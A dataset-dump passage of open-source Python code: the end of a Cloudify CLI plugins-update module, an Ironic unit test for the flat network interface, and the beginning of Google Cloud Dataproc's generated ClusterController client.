plugins_update.id,
execution.id))
raise SuppressedCloudifyCliError()
logger.info("Finished executing workflow '{0}'".format(
execution.workflow_id))
logger.info('Successfully updated plugins for blueprint {0}. '
'Plugins update ID: {1}. Execution id: {2}'
.format(blueprint_id,
plugins_update.id,
execution.id))
@plugins.command(
name='get-update',
short_help='Retrieve plugins update information [manager only]'
)
@cfy.argument('plugins-update-id')
@cfy.options.common_options
@cfy.options.tenant_name(required=False,
resource_name_for_help='plugins update')
@cfy.assert_manager_active()
@cfy.pass_client()
@cfy.pass_logger
def manager_get_update(plugins_update_id, logger, client, tenant_name):
utils.explicit_tenant_name_message(tenant_name, logger)
logger.info('Retrieving plugins update {0}...'.format(plugins_update_id))
plugins_update_dict = client.plugins_update.get(plugins_update_id)
print_single(
PLUGINS_UPDATE_COLUMNS, plugins_update_dict, 'Plugins update:')
@plugins.command(name='history', short_help='List plugins updates '
'[manager only]')
@cfy.options.blueprint_id()
@cfy.options.sort_by()
@cfy.options.descending
@cfy.options.tenant_name_for_list(
required=False, resource_name_for_help='plugins update')
@cfy.options.all_tenants
@cfy.options.search
@cfy.options.pagination_offset
@cfy.options.pagination_size
@cfy.options.common_options
@cfy.assert_manager_active()
@cfy.pass_client()
@cfy.pass_logger
def manager_history(blueprint_id,
sort_by,
descending,
all_tenants,
search,
pagination_offset,
pagination_size,
logger,
client,
tenant_name):
utils.explicit_tenant_name_message(tenant_name, logger)
if blueprint_id:
logger.info('Listing plugins updates for blueprint {0}...'.format(
blueprint_id))
else:
logger.info('Listing all plugins updates...')
plugins_updates = client.plugins_update.list(
sort=sort_by,
is_descending=descending,
_all_tenants=all_tenants,
_search=search,
_offset=pagination_offset,
_size=pagination_size,
blueprint_id=blueprint_id
)
total = plugins_updates.metadata.pagination.total
print_data(
PLUGINS_UPDATE_COLUMNS, plugins_updates, 'Plugins updates:')
logger.info('Showing {0} of {1} plugins updates'.format(
len(plugins_updates), total))
| true
| true
|
1c4228dbb2d4de48a3adda7dd0f253c0aee5db36
| 8,872
|
py
|
Python
|
ironic-plugin-pike/ironic/tests/unit/drivers/modules/network/test_flat.py
|
saintifly/Server_Manage_Plugin
|
ae272e7e3ca065236cc7bc86c296ff9eb83f1bb9
|
[
"Apache-2.0"
] | null | null | null |
ironic-plugin-pike/ironic/tests/unit/drivers/modules/network/test_flat.py
|
saintifly/Server_Manage_Plugin
|
ae272e7e3ca065236cc7bc86c296ff9eb83f1bb9
|
[
"Apache-2.0"
] | null | null | null |
ironic-plugin-pike/ironic/tests/unit/drivers/modules/network/test_flat.py
|
saintifly/Server_Manage_Plugin
|
ae272e7e3ca065236cc7bc86c296ff9eb83f1bb9
|
[
"Apache-2.0"
] | 1
|
2019-01-11T16:00:23.000Z
|
2019-01-11T16:00:23.000Z
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from neutronclient.common import exceptions as neutron_exceptions
from oslo_config import cfg
from oslo_utils import uuidutils
from ironic.common import exception
from ironic.common import neutron
from ironic.conductor import task_manager
from ironic.drivers.modules.network import flat as flat_interface
from ironic.tests.unit.conductor import mgr_utils
from ironic.tests.unit.db import base as db_base
from ironic.tests.unit.objects import utils
CONF = cfg.CONF
VIFMIXINPATH = 'ironic.drivers.modules.network.common.NeutronVIFPortIDMixin'
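# FlatNetwork delegates VIF handling to NeutronVIFPortIDMixin; the vif_* tests
# below patch the mixin and only assert that the calls are forwarded.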
class TestFlatInterface(db_base.DbTestCase):
def setUp(self):
super(TestFlatInterface, self).setUp()
self.config(enabled_drivers=['fake'])
mgr_utils.mock_the_extension_manager()
self.interface = flat_interface.FlatNetwork()
self.node = utils.create_test_node(self.context)
self.port = utils.create_test_port(
self.context, node_id=self.node.id,
internal_info={
'cleaning_vif_port_id': uuidutils.generate_uuid()})
@mock.patch('%s.vif_list' % VIFMIXINPATH)
def test_vif_list(self, mock_vif_list):
with task_manager.acquire(self.context, self.node.id) as task:
self.interface.vif_list(task)
mock_vif_list.assert_called_once_with(task)
@mock.patch('%s.vif_attach' % VIFMIXINPATH)
def test_vif_attach(self, mock_vif_attach):
vif = mock.MagicMock()
with task_manager.acquire(self.context, self.node.id) as task:
self.interface.vif_attach(task, vif)
mock_vif_attach.assert_called_once_with(task, vif)
@mock.patch('%s.vif_detach' % VIFMIXINPATH)
def test_vif_detach(self, mock_vif_detach):
vif_id = "vif"
with task_manager.acquire(self.context, self.node.id) as task:
self.interface.vif_detach(task, vif_id)
mock_vif_detach.assert_called_once_with(task, vif_id)
@mock.patch('%s.port_changed' % VIFMIXINPATH)
def test_vif_port_changed(self, mock_p_changed):
port = mock.MagicMock()
with task_manager.acquire(self.context, self.node.id) as task:
self.interface.port_changed(task, port)
mock_p_changed.assert_called_once_with(task, port)
@mock.patch.object(flat_interface, 'LOG')
def test_init_no_cleaning_network(self, mock_log):
self.config(cleaning_network=None, group='neutron')
flat_interface.FlatNetwork()
self.assertTrue(mock_log.warning.called)
@mock.patch.object(neutron, 'validate_network', autospec=True)
def test_validate(self, validate_mock):
with task_manager.acquire(self.context, self.node.id) as task:
self.interface.validate(task)
validate_mock.assert_called_once_with(CONF.neutron.cleaning_network,
'cleaning network')
@mock.patch.object(neutron, 'validate_network',
side_effect=lambda n, t: n)
@mock.patch.object(neutron, 'add_ports_to_network')
@mock.patch.object(neutron, 'rollback_ports')
def test_add_cleaning_network(self, rollback_mock, add_mock,
validate_mock):
add_mock.return_value = {self.port.uuid: 'vif-port-id'}
with task_manager.acquire(self.context, self.node.id) as task:
self.interface.add_cleaning_network(task)
rollback_mock.assert_called_once_with(
task, CONF.neutron.cleaning_network)
add_mock.assert_called_once_with(
task, CONF.neutron.cleaning_network)
validate_mock.assert_called_once_with(
CONF.neutron.cleaning_network,
'cleaning network')
self.port.refresh()
self.assertEqual('vif-port-id',
self.port.internal_info['cleaning_vif_port_id'])
@mock.patch.object(neutron, 'validate_network',
side_effect=lambda n, t: n)
@mock.patch.object(neutron, 'remove_ports_from_network')
def test_remove_cleaning_network(self, remove_mock, validate_mock):
with task_manager.acquire(self.context, self.node.id) as task:
self.interface.remove_cleaning_network(task)
remove_mock.assert_called_once_with(
task, CONF.neutron.cleaning_network)
validate_mock.assert_called_once_with(
CONF.neutron.cleaning_network,
'cleaning network')
self.port.refresh()
self.assertNotIn('cleaning_vif_port_id', self.port.internal_info)
@mock.patch.object(neutron, 'get_client')
def test_add_provisioning_network_set_binding_host_id(
self, client_mock):
upd_mock = mock.Mock()
client_mock.return_value.update_port = upd_mock
instance_info = self.node.instance_info
instance_info['nova_host_id'] = 'nova_host_id'
self.node.instance_info = instance_info
self.node.save()
extra = {'vif_port_id': 'foo'}
utils.create_test_port(self.context, node_id=self.node.id,
address='52:54:00:cf:2d:33', extra=extra,
uuid=uuidutils.generate_uuid())
exp_body = {'port': {'binding:host_id': 'nova_host_id'}}
with task_manager.acquire(self.context, self.node.id) as task:
self.interface.add_provisioning_network(task)
upd_mock.assert_called_once_with('foo', exp_body)
@mock.patch.object(neutron, 'get_client')
def test_add_provisioning_network_set_binding_host_id_portgroup(
self, client_mock):
upd_mock = mock.Mock()
client_mock.return_value.update_port = upd_mock
instance_info = self.node.instance_info
instance_info['nova_host_id'] = 'nova_host_id'
self.node.instance_info = instance_info
self.node.save()
internal_info = {'tenant_vif_port_id': 'foo'}
utils.create_test_portgroup(
self.context, node_id=self.node.id, internal_info=internal_info,
uuid=uuidutils.generate_uuid())
utils.create_test_port(
self.context, node_id=self.node.id, address='52:54:00:cf:2d:33',
extra={'vif_port_id': 'bar'}, uuid=uuidutils.generate_uuid())
exp_body = {'port': {'binding:host_id': 'nova_host_id'}}
with task_manager.acquire(self.context, self.node.id) as task:
self.interface.add_provisioning_network(task)
upd_mock.assert_has_calls([
mock.call('bar', exp_body), mock.call('foo', exp_body)
])
@mock.patch.object(neutron, 'get_client')
def test_add_provisioning_network_no_binding_host_id(
self, client_mock):
upd_mock = mock.Mock()
client_mock.return_value.update_port = upd_mock
instance_info = self.node.instance_info
instance_info.pop('nova_host_id', None)
self.node.instance_info = instance_info
self.node.save()
extra = {'vif_port_id': 'foo'}
utils.create_test_port(self.context, node_id=self.node.id,
address='52:54:00:cf:2d:33', extra=extra,
uuid=uuidutils.generate_uuid())
with task_manager.acquire(self.context, self.node.id) as task:
self.interface.add_provisioning_network(task)
self.assertFalse(upd_mock.called)
@mock.patch.object(neutron, 'get_client')
def test_add_provisioning_network_binding_host_id_raise(
self, client_mock):
client_mock.return_value.update_port.side_effect = \
(neutron_exceptions.ConnectionFailed())
instance_info = self.node.instance_info
instance_info['nova_host_id'] = 'nova_host_id'
self.node.instance_info = instance_info
self.node.save()
extra = {'vif_port_id': 'foo'}
utils.create_test_port(self.context, node_id=self.node.id,
address='52:54:00:cf:2d:33', extra=extra,
uuid=uuidutils.generate_uuid())
with task_manager.acquire(self.context, self.node.id) as task:
self.assertRaises(exception.NetworkError,
self.interface.add_provisioning_network,
task)
| 46.208333
| 78
| 0.664675
|
import mock
from neutronclient.common import exceptions as neutron_exceptions
from oslo_config import cfg
from oslo_utils import uuidutils
from ironic.common import exception
from ironic.common import neutron
from ironic.conductor import task_manager
from ironic.drivers.modules.network import flat as flat_interface
from ironic.tests.unit.conductor import mgr_utils
from ironic.tests.unit.db import base as db_base
from ironic.tests.unit.objects import utils
CONF = cfg.CONF
VIFMIXINPATH = 'ironic.drivers.modules.network.common.NeutronVIFPortIDMixin'
class TestFlatInterface(db_base.DbTestCase):
def setUp(self):
super(TestFlatInterface, self).setUp()
self.config(enabled_drivers=['fake'])
mgr_utils.mock_the_extension_manager()
self.interface = flat_interface.FlatNetwork()
self.node = utils.create_test_node(self.context)
self.port = utils.create_test_port(
self.context, node_id=self.node.id,
internal_info={
'cleaning_vif_port_id': uuidutils.generate_uuid()})
@mock.patch('%s.vif_list' % VIFMIXINPATH)
def test_vif_list(self, mock_vif_list):
with task_manager.acquire(self.context, self.node.id) as task:
self.interface.vif_list(task)
mock_vif_list.assert_called_once_with(task)
@mock.patch('%s.vif_attach' % VIFMIXINPATH)
def test_vif_attach(self, mock_vif_attach):
vif = mock.MagicMock()
with task_manager.acquire(self.context, self.node.id) as task:
self.interface.vif_attach(task, vif)
mock_vif_attach.assert_called_once_with(task, vif)
@mock.patch('%s.vif_detach' % VIFMIXINPATH)
def test_vif_detach(self, mock_vif_detach):
vif_id = "vif"
with task_manager.acquire(self.context, self.node.id) as task:
self.interface.vif_detach(task, vif_id)
mock_vif_detach.assert_called_once_with(task, vif_id)
@mock.patch('%s.port_changed' % VIFMIXINPATH)
def test_vif_port_changed(self, mock_p_changed):
port = mock.MagicMock()
with task_manager.acquire(self.context, self.node.id) as task:
self.interface.port_changed(task, port)
mock_p_changed.assert_called_once_with(task, port)
@mock.patch.object(flat_interface, 'LOG')
def test_init_no_cleaning_network(self, mock_log):
self.config(cleaning_network=None, group='neutron')
flat_interface.FlatNetwork()
self.assertTrue(mock_log.warning.called)
@mock.patch.object(neutron, 'validate_network', autospec=True)
def test_validate(self, validate_mock):
with task_manager.acquire(self.context, self.node.id) as task:
self.interface.validate(task)
validate_mock.assert_called_once_with(CONF.neutron.cleaning_network,
'cleaning network')
@mock.patch.object(neutron, 'validate_network',
side_effect=lambda n, t: n)
@mock.patch.object(neutron, 'add_ports_to_network')
@mock.patch.object(neutron, 'rollback_ports')
def test_add_cleaning_network(self, rollback_mock, add_mock,
validate_mock):
add_mock.return_value = {self.port.uuid: 'vif-port-id'}
with task_manager.acquire(self.context, self.node.id) as task:
self.interface.add_cleaning_network(task)
rollback_mock.assert_called_once_with(
task, CONF.neutron.cleaning_network)
add_mock.assert_called_once_with(
task, CONF.neutron.cleaning_network)
validate_mock.assert_called_once_with(
CONF.neutron.cleaning_network,
'cleaning network')
self.port.refresh()
self.assertEqual('vif-port-id',
self.port.internal_info['cleaning_vif_port_id'])
@mock.patch.object(neutron, 'validate_network',
side_effect=lambda n, t: n)
@mock.patch.object(neutron, 'remove_ports_from_network')
def test_remove_cleaning_network(self, remove_mock, validate_mock):
with task_manager.acquire(self.context, self.node.id) as task:
self.interface.remove_cleaning_network(task)
remove_mock.assert_called_once_with(
task, CONF.neutron.cleaning_network)
validate_mock.assert_called_once_with(
CONF.neutron.cleaning_network,
'cleaning network')
self.port.refresh()
self.assertNotIn('cleaning_vif_port_id', self.port.internal_info)
@mock.patch.object(neutron, 'get_client')
def test_add_provisioning_network_set_binding_host_id(
self, client_mock):
upd_mock = mock.Mock()
client_mock.return_value.update_port = upd_mock
instance_info = self.node.instance_info
instance_info['nova_host_id'] = 'nova_host_id'
self.node.instance_info = instance_info
self.node.save()
extra = {'vif_port_id': 'foo'}
utils.create_test_port(self.context, node_id=self.node.id,
address='52:54:00:cf:2d:33', extra=extra,
uuid=uuidutils.generate_uuid())
exp_body = {'port': {'binding:host_id': 'nova_host_id'}}
with task_manager.acquire(self.context, self.node.id) as task:
self.interface.add_provisioning_network(task)
upd_mock.assert_called_once_with('foo', exp_body)
@mock.patch.object(neutron, 'get_client')
def test_add_provisioning_network_set_binding_host_id_portgroup(
self, client_mock):
upd_mock = mock.Mock()
client_mock.return_value.update_port = upd_mock
instance_info = self.node.instance_info
instance_info['nova_host_id'] = 'nova_host_id'
self.node.instance_info = instance_info
self.node.save()
internal_info = {'tenant_vif_port_id': 'foo'}
utils.create_test_portgroup(
self.context, node_id=self.node.id, internal_info=internal_info,
uuid=uuidutils.generate_uuid())
utils.create_test_port(
self.context, node_id=self.node.id, address='52:54:00:cf:2d:33',
extra={'vif_port_id': 'bar'}, uuid=uuidutils.generate_uuid())
exp_body = {'port': {'binding:host_id': 'nova_host_id'}}
with task_manager.acquire(self.context, self.node.id) as task:
self.interface.add_provisioning_network(task)
upd_mock.assert_has_calls([
mock.call('bar', exp_body), mock.call('foo', exp_body)
])
@mock.patch.object(neutron, 'get_client')
def test_add_provisioning_network_no_binding_host_id(
self, client_mock):
upd_mock = mock.Mock()
client_mock.return_value.update_port = upd_mock
instance_info = self.node.instance_info
instance_info.pop('nova_host_id', None)
self.node.instance_info = instance_info
self.node.save()
extra = {'vif_port_id': 'foo'}
utils.create_test_port(self.context, node_id=self.node.id,
address='52:54:00:cf:2d:33', extra=extra,
uuid=uuidutils.generate_uuid())
with task_manager.acquire(self.context, self.node.id) as task:
self.interface.add_provisioning_network(task)
self.assertFalse(upd_mock.called)
@mock.patch.object(neutron, 'get_client')
def test_add_provisioning_network_binding_host_id_raise(
self, client_mock):
client_mock.return_value.update_port.side_effect = \
(neutron_exceptions.ConnectionFailed())
instance_info = self.node.instance_info
instance_info['nova_host_id'] = 'nova_host_id'
self.node.instance_info = instance_info
self.node.save()
extra = {'vif_port_id': 'foo'}
utils.create_test_port(self.context, node_id=self.node.id,
address='52:54:00:cf:2d:33', extra=extra,
uuid=uuidutils.generate_uuid())
with task_manager.acquire(self.context, self.node.id) as task:
self.assertRaises(exception.NetworkError,
self.interface.add_provisioning_network,
task)
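# --- Hedged illustration (not part of the original test module) ---
# The add_provisioning_network tests above all assert the same Neutron
# port-update payload shape.  A standalone sketch of that expectation;
# 'compute-42' and 'vif-port-id' are made-up placeholder ids.
def _demo_binding_host_id_payload():
    client = mock.Mock()
    exp_body = {'port': {'binding:host_id': 'compute-42'}}
    client.update_port('vif-port-id', exp_body)
    client.update_port.assert_called_once_with('vif-port-id', exp_body)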
| true
| true
|
1c422994b9f5e1e95b9791a3d2ed123c94ba30ac
| 37,827
|
py
|
Python
|
dataproc/google/cloud/dataproc_v1beta2/gapic/cluster_controller_client.py
|
ryanyuan/google-cloud-python
|
db481bfdd6816d020d99df0d4caa307358ab1141
|
[
"Apache-2.0"
] | 2
|
2021-11-26T07:08:43.000Z
|
2022-03-07T20:20:04.000Z
|
dataproc/google/cloud/dataproc_v1beta2/gapic/cluster_controller_client.py
|
ryanyuan/google-cloud-python
|
db481bfdd6816d020d99df0d4caa307358ab1141
|
[
"Apache-2.0"
] | null | null | null |
dataproc/google/cloud/dataproc_v1beta2/gapic/cluster_controller_client.py
|
ryanyuan/google-cloud-python
|
db481bfdd6816d020d99df0d4caa307358ab1141
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
#
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Accesses the google.cloud.dataproc.v1beta2 ClusterController API."""
import functools
import pkg_resources
import warnings
from google.oauth2 import service_account
import google.api_core.client_options
import google.api_core.gapic_v1.client_info
import google.api_core.gapic_v1.config
import google.api_core.gapic_v1.method
import google.api_core.grpc_helpers
import google.api_core.operation
import google.api_core.operations_v1
import google.api_core.page_iterator
import grpc
from google.cloud.dataproc_v1beta2.gapic import cluster_controller_client_config
from google.cloud.dataproc_v1beta2.gapic import enums
from google.cloud.dataproc_v1beta2.gapic.transports import (
cluster_controller_grpc_transport,
)
from google.cloud.dataproc_v1beta2.proto import autoscaling_policies_pb2
from google.cloud.dataproc_v1beta2.proto import autoscaling_policies_pb2_grpc
from google.cloud.dataproc_v1beta2.proto import clusters_pb2
from google.cloud.dataproc_v1beta2.proto import clusters_pb2_grpc
from google.cloud.dataproc_v1beta2.proto import operations_pb2 as proto_operations_pb2
from google.longrunning import operations_pb2 as longrunning_operations_pb2
from google.protobuf import duration_pb2
from google.protobuf import empty_pb2
from google.protobuf import field_mask_pb2
_GAPIC_LIBRARY_VERSION = pkg_resources.get_distribution("google-cloud-dataproc").version
class ClusterControllerClient(object):
"""
The ClusterControllerService provides methods to manage clusters
of Compute Engine instances.
"""
SERVICE_ADDRESS = "dataproc.googleapis.com:443"
"""The default address of the service."""
# The name of the interface for this client. This is the key used to
# find the method configuration in the client_config dictionary.
_INTERFACE_NAME = "google.cloud.dataproc.v1beta2.ClusterController"
@classmethod
def from_service_account_file(cls, filename, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
ClusterControllerClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_file(filename)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
from_service_account_json = from_service_account_file
def __init__(
self,
transport=None,
channel=None,
credentials=None,
client_config=None,
client_info=None,
client_options=None,
):
"""Constructor.
Args:
transport (Union[~.ClusterControllerGrpcTransport,
Callable[[~.Credentials, type], ~.ClusterControllerGrpcTransport]): A transport
instance, responsible for actually making the API calls.
The default transport uses the gRPC protocol.
This argument may also be a callable which returns a
transport instance. Callables will be sent the credentials
as the first argument and the default transport class as
the second argument.
channel (grpc.Channel): DEPRECATED. A ``Channel`` instance
through which to make calls. This argument is mutually exclusive
with ``credentials``; providing both will raise an exception.
credentials (google.auth.credentials.Credentials): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If none
are specified, the client will attempt to ascertain the
credentials from the environment.
This argument is mutually exclusive with providing a
transport instance to ``transport``; doing so will raise
an exception.
client_config (dict): DEPRECATED. A dictionary of call options for
each method. If not specified, the default configuration is used.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
client_options (Union[dict, google.api_core.client_options.ClientOptions]):
Client options used to set user options on the client. API Endpoint
should be set through client_options.
"""
# Raise deprecation warnings for things we want to go away.
if client_config is not None:
warnings.warn(
"The `client_config` argument is deprecated.",
PendingDeprecationWarning,
stacklevel=2,
)
else:
client_config = cluster_controller_client_config.config
if channel:
warnings.warn(
"The `channel` argument is deprecated; use " "`transport` instead.",
PendingDeprecationWarning,
stacklevel=2,
)
api_endpoint = self.SERVICE_ADDRESS
if client_options:
if type(client_options) == dict:
client_options = google.api_core.client_options.from_dict(
client_options
)
if client_options.api_endpoint:
api_endpoint = client_options.api_endpoint
# Instantiate the transport.
# The transport is responsible for handling serialization and
# deserialization and actually sending data to the service.
if transport:
if callable(transport):
self.transport = transport(
credentials=credentials,
default_class=cluster_controller_grpc_transport.ClusterControllerGrpcTransport,
address=api_endpoint,
)
else:
if credentials:
raise ValueError(
"Received both a transport instance and "
"credentials; these are mutually exclusive."
)
self.transport = transport
else:
self.transport = cluster_controller_grpc_transport.ClusterControllerGrpcTransport(
address=api_endpoint, channel=channel, credentials=credentials
)
if client_info is None:
client_info = google.api_core.gapic_v1.client_info.ClientInfo(
gapic_version=_GAPIC_LIBRARY_VERSION
)
else:
client_info.gapic_version = _GAPIC_LIBRARY_VERSION
self._client_info = client_info
# Parse out the default settings for retry and timeout for each RPC
# from the client configuration.
# (Ordinarily, these are the defaults specified in the `*_config.py`
# file next to this one.)
self._method_configs = google.api_core.gapic_v1.config.parse_method_configs(
client_config["interfaces"][self._INTERFACE_NAME]
)
# Save a dictionary of cached API call functions.
# These are the actual callables which invoke the proper
# transport methods, wrapped with `wrap_method` to add retry,
# timeout, and the like.
self._inner_api_calls = {}
# Service calls
def create_cluster(
self,
project_id,
region,
cluster,
request_id=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Creates a cluster in a project.
Example:
>>> from google.cloud import dataproc_v1beta2
>>>
>>> client = dataproc_v1beta2.ClusterControllerClient()
>>>
>>> # TODO: Initialize `project_id`:
>>> project_id = ''
>>>
>>> # TODO: Initialize `region`:
>>> region = ''
>>>
>>> # TODO: Initialize `cluster`:
>>> cluster = {}
>>>
>>> response = client.create_cluster(project_id, region, cluster)
>>>
>>> def callback(operation_future):
... # Handle result.
... result = operation_future.result()
>>>
>>> response.add_done_callback(callback)
>>>
>>> # Handle metadata.
>>> metadata = response.metadata()
Args:
project_id (str): Required. The ID of the Google Cloud Platform project that the cluster
belongs to.
region (str): Required. The Cloud Dataproc region in which to handle the request.
cluster (Union[dict, ~google.cloud.dataproc_v1beta2.types.Cluster]): Required. The cluster to create.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.dataproc_v1beta2.types.Cluster`
request_id (str): Optional. A unique id used to identify the request. If the server
receives two ``CreateClusterRequest`` requests with the same id, then
the second request will be ignored and the first
``google.longrunning.Operation`` created and stored in the backend is
returned.
It is recommended to always set this value to a
`UUID <https://en.wikipedia.org/wiki/Universally_unique_identifier>`__.
The id must contain only letters (a-z, A-Z), numbers (0-9), underscores
(\_), and hyphens (-). The maximum length is 40 characters.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will
be retried using a default configuration.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.dataproc_v1beta2.types._OperationFuture` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "create_cluster" not in self._inner_api_calls:
self._inner_api_calls[
"create_cluster"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.create_cluster,
default_retry=self._method_configs["CreateCluster"].retry,
default_timeout=self._method_configs["CreateCluster"].timeout,
client_info=self._client_info,
)
request = clusters_pb2.CreateClusterRequest(
project_id=project_id, region=region, cluster=cluster, request_id=request_id
)
operation = self._inner_api_calls["create_cluster"](
request, retry=retry, timeout=timeout, metadata=metadata
)
return google.api_core.operation.from_gapic(
operation,
self.transport._operations_client,
clusters_pb2.Cluster,
metadata_type=proto_operations_pb2.ClusterOperationMetadata,
)
def update_cluster(
self,
project_id,
region,
cluster_name,
cluster,
update_mask,
graceful_decommission_timeout=None,
request_id=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Updates a cluster in a project.
Example:
>>> from google.cloud import dataproc_v1beta2
>>>
>>> client = dataproc_v1beta2.ClusterControllerClient()
>>>
>>> # TODO: Initialize `project_id`:
>>> project_id = ''
>>>
>>> # TODO: Initialize `region`:
>>> region = ''
>>>
>>> # TODO: Initialize `cluster_name`:
>>> cluster_name = ''
>>>
>>> # TODO: Initialize `cluster`:
>>> cluster = {}
>>>
>>> # TODO: Initialize `update_mask`:
>>> update_mask = {}
>>>
>>> response = client.update_cluster(project_id, region, cluster_name, cluster, update_mask)
>>>
>>> def callback(operation_future):
... # Handle result.
... result = operation_future.result()
>>>
>>> response.add_done_callback(callback)
>>>
>>> # Handle metadata.
>>> metadata = response.metadata()
Args:
project_id (str): Required. The ID of the Google Cloud Platform project the
cluster belongs to.
region (str): Required. The Cloud Dataproc region in which to handle the request.
cluster_name (str): Required. The cluster name.
cluster (Union[dict, ~google.cloud.dataproc_v1beta2.types.Cluster]): Required. The changes to the cluster.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.dataproc_v1beta2.types.Cluster`
update_mask (Union[dict, ~google.cloud.dataproc_v1beta2.types.FieldMask]): Required. Specifies the path, relative to ``Cluster``, of the field to
update. For example, to change the number of workers in a cluster to 5,
the ``update_mask`` parameter would be specified as
``config.worker_config.num_instances``, and the ``PATCH`` request body
would specify the new value, as follows:
::
{
"config":{
"workerConfig":{
"numInstances":"5"
}
}
}
Similarly, to change the number of preemptible workers in a cluster to
5, the ``update_mask`` parameter would be
``config.secondary_worker_config.num_instances``, and the ``PATCH``
request body would be set as follows:
::
{
"config":{
"secondaryWorkerConfig":{
"numInstances":"5"
}
}
}
Note: currently only the following fields can be updated:
.. raw:: html
<table>
<tr>
<td><strong>Mask</strong></td><td><strong>Purpose</strong></td>
</tr>
<tr>
<td>labels</td><td>Updates labels</td>
</tr>
<tr>
<td>config.worker_config.num_instances</td><td>Resize primary worker
group</td>
</tr>
<tr>
<td>config.secondary_worker_config.num_instances</td><td>Resize secondary
worker group</td>
</tr>
<tr>
<td>config.lifecycle_config.auto_delete_ttl</td><td>Reset MAX TTL
duration</td>
</tr>
<tr>
<td>config.lifecycle_config.auto_delete_time</td><td>Update MAX TTL
deletion timestamp</td>
</tr>
<tr>
<td>config.lifecycle_config.idle_delete_ttl</td><td>Update Idle TTL
duration</td>
</tr>
<tr>
<td>config.autoscaling_config.policy_uri</td><td>Use, stop using, or change
autoscaling policies</td>
</tr>
</table>
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.dataproc_v1beta2.types.FieldMask`
            graceful_decommission_timeout (Union[dict, ~google.cloud.dataproc_v1beta2.types.Duration]): Optional. Timeout for graceful YARN decommissioning. Graceful
decommissioning allows removing nodes from the cluster without
interrupting jobs in progress. Timeout specifies how long to wait for jobs
in progress to finish before forcefully removing nodes (and potentially
interrupting jobs). Default timeout is 0 (for forceful decommission), and
the maximum allowed timeout is 1 day.
Only supported on Dataproc image versions 1.2 and higher.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.dataproc_v1beta2.types.Duration`
request_id (str): Optional. A unique id used to identify the request. If the server
receives two ``UpdateClusterRequest`` requests with the same id, then
the second request will be ignored and the first
``google.longrunning.Operation`` created and stored in the backend is
returned.
It is recommended to always set this value to a
`UUID <https://en.wikipedia.org/wiki/Universally_unique_identifier>`__.
The id must contain only letters (a-z, A-Z), numbers (0-9), underscores
(\_), and hyphens (-). The maximum length is 40 characters.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will
be retried using a default configuration.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.dataproc_v1beta2.types._OperationFuture` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "update_cluster" not in self._inner_api_calls:
self._inner_api_calls[
"update_cluster"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.update_cluster,
default_retry=self._method_configs["UpdateCluster"].retry,
default_timeout=self._method_configs["UpdateCluster"].timeout,
client_info=self._client_info,
)
request = clusters_pb2.UpdateClusterRequest(
project_id=project_id,
region=region,
cluster_name=cluster_name,
cluster=cluster,
update_mask=update_mask,
graceful_decommission_timeout=graceful_decommission_timeout,
request_id=request_id,
)
operation = self._inner_api_calls["update_cluster"](
request, retry=retry, timeout=timeout, metadata=metadata
)
return google.api_core.operation.from_gapic(
operation,
self.transport._operations_client,
clusters_pb2.Cluster,
metadata_type=proto_operations_pb2.ClusterOperationMetadata,
)
def delete_cluster(
self,
project_id,
region,
cluster_name,
cluster_uuid=None,
request_id=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Deletes a cluster in a project.
Example:
>>> from google.cloud import dataproc_v1beta2
>>>
>>> client = dataproc_v1beta2.ClusterControllerClient()
>>>
